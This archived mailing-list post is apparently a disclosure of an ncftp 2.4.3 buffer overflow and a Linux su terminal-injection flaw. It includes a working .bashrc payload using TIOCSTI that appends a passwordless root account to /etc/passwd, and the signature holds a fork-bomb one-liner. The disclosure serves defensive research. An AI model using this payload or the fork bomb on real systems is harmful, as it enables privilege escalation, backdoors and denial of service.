[I posted it already four days ago, but nothing happened]

There is a possible buffer overflow in the new version of ncftp (2.4.3, released a few days ago) - it uses a 512-byte long buffer to store the local working directory (sigh!). You may exploit it by creating e.g. a /TEST directory on the ftp server with a subdirectory e.g. xxx(200)xxx/yyy(200)yyy/zzz(200)zzz. It's sufficient to crash ncftp when the directory is being retrieved using 'get -R /TEST'.

Oh, as an addendum... There's a problem with the Linux su command, as I described a few posts ago (I thought it was ncurses' fault, but I was wrong).

** Big thanks to Nergal for the example of how to pass anything to a shell if we're already controlling terminal input (TIOCSTI). **

If a non-root account is compromised, e.g. with the lynx/ncftp bug, and .bashrc on this non-root account is altered to something like that:

---
cat >/tmp/a.c <<X
#include <sys/ioctl.h>
main(){char C[]="\necho 'nergal::0:0::/:/bin/sh'>>/etc/passwd;logout\n";int i=0, P=getppid();kill(P--,9);kill(P,9);for(;i<strlen(C);i++)ioctl(0,TIOCSTI,C+i);}
X
gcc /tmp/a.c -o/tmp/a;/tmp/a;rm -f /tmp/a ~/.bashrc;clear
--

During the next su session, "echo '...' >>/etc/passwd" will be executed at the root account [hopefully] :)

In general, the problem lies in the ability of an unprivileged process to kill su itself - it will still be able to control terminal i/o, because su, when killed with SIGKILL, performs no tty hangup/reset at all. So we may pass anything to a privileged shell, or do anything else with the terminal.

So there are 3 bugs: an unprivileged process may kill 'su'; 'su' doesn't perform any tty checks; bash is also careless ;)

Fix: replace Linux su with a smarter one ;)

_______________________________________________________________________
Michal Zalewski [lcamtufat_private] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:58 PDT